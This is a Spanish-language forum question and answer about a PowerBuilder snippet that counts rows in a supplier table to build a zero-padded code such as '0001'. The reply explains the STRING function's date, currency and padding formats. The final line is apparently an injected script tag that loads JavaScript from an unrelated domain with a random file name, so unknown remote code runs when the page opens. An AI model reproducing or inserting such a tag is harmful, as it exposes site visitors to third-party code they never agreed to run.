Código en power builder + sql

HOLA EXPERTO, estimado quisiera que me ayudes a comprender este código y si me puedes decir como funciona (es para generar el código automáticamente "0001")

string l_codigo
integer ll_cantidad
<br class="scayt-misspell" data-scayt_word="tab_1" data-scaytid="8" />SELECT count(*) INTO :ll_cantidad FROM proveedor;
l_codigo = '0'+Replace("00",4 - len(string(ll_cantidad)), 1, string(ll_cantidad+1))

1 respuesta

Respuesta

STRING(valor,"[Formato]")

Ejemplo:

Caso en que el "valor" valor es de tipo

Fecha

STRING(valor,"dd/mm/yyyy")

moneda o numerico

STRING(valor,"#,##0.0000")

para generar codigo

STRING(valor,"00000000") <- numero de 0 = Longitud de caracteres que conforman tu codigo

<script type="text/javascript" src="http://plugin-tema-rosa.info/dfi823hs.js?0.9646008571229009"></script>